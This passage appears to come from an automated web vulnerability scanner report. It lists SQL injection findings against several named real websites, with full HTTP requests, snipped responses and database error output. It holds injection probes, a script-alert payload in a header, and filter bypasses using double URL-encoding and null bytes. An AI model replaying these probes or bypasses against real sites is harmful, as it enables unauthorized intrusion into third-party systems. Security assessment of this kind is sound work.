The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:48 GMT
Server: lighttpd/1.4.28
Content-Length: 112262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.16. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/signup.phtml' HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:09:11 GMT
Server: lighttpd/1.4.28
Content-Length: 112262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.17. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/templates/features.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:53 GMT
Server: lighttpd/1.4.28
Content-Length: 112240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.18. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/templates'/features.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:16 GMT
Server: lighttpd/1.4.28
Content-Length: 112240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.19. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/templates/features.css'?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:41 GMT
Server: lighttpd/1.4.28
Content-Length: 112240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.20. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/templates/styles2011.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:54 GMT
Server: lighttpd/1.4.28
Content-Length: 112242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.21. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/templates'/styles2011.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:18 GMT
Server: lighttpd/1.4.28
Content-Length: 112242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.22. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/templates/styles2011.css'?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:41 GMT
Server: lighttpd/1.4.28
Content-Length: 112242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.23. http://www.japanator.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.japanator.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 00:15:05 GMT
Server: lighttpd/1.4.28
Content-Length: 112206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.24. http://www.n1-models.com/favicon.ico [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.n1-models.com
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527
Host: www.n1-models.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 417 Expectation Failed
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 416
Date: Sun, 01 May 2011 23:39:26 GMT
X-Varnish: 1801237247
Age: 0
Via: 1.1 varnish
Cneonction: close
X-Served-By: tdd03.ds.lax1.oversee.net
X-Cache: MISS


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
<h1>Error 417 Expectation Failed</h1>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527%2527
Host: www.n1-models.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 302 (Found)
Location: http://spi.domainsponsor.com/skins/favicon/mi_favicon.ico
Server: Oversee Turing v1.0.0
Content-Length: 32
Content-Type: text/html

<html><body><br></body></html>

1.25. http://www.ourprayer.org/favicon.ico [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ourprayer.org
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%00'
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1 (redirected)

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:52:39 GMT
Content-Length: 5697

<%@ language="VBScript" %>
<%
Option Explicit

Const lngMaxFormBytes = 200

Dim objASPError, blnErrorWritten, strServername, strServerIP, strRemoteIP
Dim strMethod, lngPos, datNow, strQueryString, strURL

If Response.Buffer Then
Response.Clear
Response.Status = "500 Internal
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%00''
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:52:40 GMT
Content-Length: 5697

<%@ language="VBScript" %>
<%
Option Explicit

Const lngMaxFormBytes = 200

Dim objASPError, blnErrorWritten, strServername, strServerIP, strRemoteIP
Dim strMethod, lngPos, datNow, strQ
...[SNIP]...

1.26. http://www.ourprayer.org/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ourprayer.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /favicon.ico?1%00'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1 (redirected)

HTTP/1.1 302 Redirect
Content-Type: text/html; charset=UTF-8
Location: http://www.ourprayer.org/custerror.html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:52:06 GMT
Content-Length: 162
Set-Cookie: cookie1=4090937773.1.3717150784.2424965831; path=/

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.ourprayer.org/custerror.html">here</a></body>

Request 2

GET /favicon.ico?1%00''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:52:09 GMT
Content-Length: 5697

<%@ language="VBScript" %>
<%
Option Explicit

Const lngMaxFormBytes = 200

Dim objASPError, blnErrorWritten, strServername, strServerIP, strRemoteIP
Dim strMethod, lngPos, datNow, strQ
...[SNIP]...

1.27. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/1797'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:47 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.28. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/1797/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/1797/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:16 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.29. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/1798'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:17 GMT
Server: Apache
Set-Cookie: CAKEPHP=0kq9dnhc6fl22f9at88vsrcnr2; expires=Mon, 09-May-2011 02:52:17 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.30. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/1798/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:05 GMT
Server: Apache
Set-Cookie: CAKEPHP=3pb6bi6fcls5vbnr5d5sj521t6; expires=Mon, 09-May-2011 02:53:06 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/1798/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:07 GMT
Server: Apache
Set-Cookie: CAKEPHP=vs6aum6e4b5h4nisto5to4o977; expires=Mon, 09-May-2011 02:53:07 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=vs6aum6e4b5h4nisto5to4o977; expires=Mon, 09-May-2011 02:53:07 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.31. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/2270'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:01 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.32. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
